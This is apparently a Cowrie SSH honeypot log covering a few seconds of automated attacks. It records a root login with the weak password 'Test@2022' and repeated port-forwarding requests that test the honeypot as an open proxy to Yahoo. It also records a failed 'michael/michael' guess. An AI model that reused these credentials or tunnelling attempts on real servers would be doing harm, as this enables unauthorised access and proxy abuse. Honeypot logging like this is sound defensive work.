{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19878,"dst_ip":"1.2.3.4","dst_port":22,"session":"ccff5b783eba","protocol":"ssh","message":"New connection: 213.209.150.239:19878 (1.2.3.4:22) [session: ccff5b783eba]","sensor":"my-vps","timestamp":"2025-08-26T01:01:46.416758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:46.417463Z","src_ip":"213.209.150.239","session":"ccff5b783eba"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:46.474306Z","src_ip":"213.209.150.239","session":"ccff5b783eba"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:46.756051Z","src_ip":"213.209.150.239","session":"ccff5b783eba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":20711,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:20711","sensor":"my-vps","timestamp":"2025-08-26T01:01:46.813589Z","session":"ccff5b783eba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:46.870178Z","src_ip":"213.209.150.239","session":"ccff5b783eba"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":47356,"dst_ip":"1.2.3.4","dst_port":22,"session":"c543e11925d8","protocol":"ssh","message":"New connection: 36.89.28.139:47356 (1.2.3.4:22) [session: c543e11925d8]","sensor":"my-vps","timestamp":"2025-08-26T01:01:46.978852Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:46.979633Z","src_ip":"36.89.28.139","session":"c543e11925d8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":11495,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:11495","sensor":"my-vps","timestamp":"2025-08-26T01:01:47.027804Z","session":"ccff5b783eba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:47.084438Z","src_ip":"213.209.150.239","session":"ccff5b783eba"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:47.142170Z","src_ip":"213.209.150.239","session":"ccff5b783eba"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19935,"dst_ip":"1.2.3.4","dst_port":22,"session":"aaa0c665dac8","protocol":"ssh","message":"New connection: 213.209.150.239:19935 (1.2.3.4:22) [session: aaa0c665dac8]","sensor":"my-vps","timestamp":"2025-08-26T01:01:47.197966Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:47.199080Z","src_ip":"213.209.150.239","session":"aaa0c665dac8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:47.255710Z","src_ip":"213.209.150.239","session":"aaa0c665dac8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:47.538433Z","src_ip":"213.209.150.239","session":"aaa0c665dac8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":10004,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:10004","sensor":"my-vps","timestamp":"2025-08-26T01:01:47.596947Z","session":"aaa0c665dac8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:47.653905Z","src_ip":"213.209.150.239","session":"aaa0c665dac8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:01:47.716419Z","src_ip":"36.89.28.139","session":"c543e11925d8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":11952,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:11952","sensor":"my-vps","timestamp":"2025-08-26T01:01:47.811787Z","session":"aaa0c665dac8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:47.869007Z","src_ip":"213.209.150.239","session":"aaa0c665dac8"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:47.926811Z","src_ip":"213.209.150.239","session":"aaa0c665dac8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":19994,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ab54de18c7b","protocol":"ssh","message":"New connection: 213.209.150.239:19994 (1.2.3.4:22) [session: 8ab54de18c7b]","sensor":"my-vps","timestamp":"2025-08-26T01:01:47.982211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:47.983046Z","src_ip":"213.209.150.239","session":"8ab54de18c7b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:48.039806Z","src_ip":"213.209.150.239","session":"8ab54de18c7b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:48.321805Z","src_ip":"213.209.150.239","session":"8ab54de18c7b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":10,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:10","sensor":"my-vps","timestamp":"2025-08-26T01:01:48.379515Z","session":"8ab54de18c7b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:48.436579Z","src_ip":"213.209.150.239","session":"8ab54de18c7b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":17531,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:17531","sensor":"my-vps","timestamp":"2025-08-26T01:01:48.590632Z","session":"8ab54de18c7b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:48.647145Z","src_ip":"213.209.150.239","session":"8ab54de18c7b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:48.704434Z","src_ip":"213.209.150.239","session":"8ab54de18c7b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":20138,"dst_ip":"1.2.3.4","dst_port":22,"session":"9972b595a1aa","protocol":"ssh","message":"New connection: 213.209.150.239:20138 (1.2.3.4:22) [session: 9972b595a1aa]","sensor":"my-vps","timestamp":"2025-08-26T01:01:48.750474Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:48.751450Z","src_ip":"213.209.150.239","session":"9972b595a1aa"}
{"eventid":"cowrie.login.failed","username":"michael","password":"michael","message":"login attempt [michael/michael] failed","sensor":"my-vps","timestamp":"2025-08-26T01:01:48.758986Z","src_ip":"36.89.28.139","session":"c543e11925d8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:48.798425Z","src_ip":"213.209.150.239","session":"9972b595a1aa"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:49.032723Z","src_ip":"213.209.150.239","session":"9972b595a1aa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":28501,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:28501","sensor":"my-vps","timestamp":"2025-08-26T01:01:49.080762Z","session":"9972b595a1aa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:49.127806Z","src_ip":"213.209.150.239","session":"9972b595a1aa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":10059,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:10059","sensor":"my-vps","timestamp":"2025-08-26T01:01:49.265393Z","session":"9972b595a1aa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:49.312498Z","src_ip":"213.209.150.239","session":"9972b595a1aa"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:49.360309Z","src_ip":"213.209.150.239","session":"9972b595a1aa"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":20192,"dst_ip":"1.2.3.4","dst_port":22,"session":"4692cad31592","protocol":"ssh","message":"New connection: 213.209.150.239:20192 (1.2.3.4:22) [session: 4692cad31592]","sensor":"my-vps","timestamp":"2025-08-26T01:01:49.416010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:49.416715Z","src_ip":"213.209.150.239","session":"4692cad31592"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:49.473523Z","src_ip":"213.209.150.239","session":"4692cad31592"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:49.755888Z","src_ip":"213.209.150.239","session":"4692cad31592"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":18456,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:18456","sensor":"my-vps","timestamp":"2025-08-26T01:01:49.814727Z","session":"4692cad31592"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:49.871535Z","src_ip":"213.209.150.239","session":"4692cad31592"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:49.933021Z","src_ip":"36.89.28.139","session":"c543e11925d8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":9847,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:9847","sensor":"my-vps","timestamp":"2025-08-26T01:01:50.027090Z","session":"4692cad31592"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:50.083820Z","src_ip":"213.209.150.239","session":"4692cad31592"}
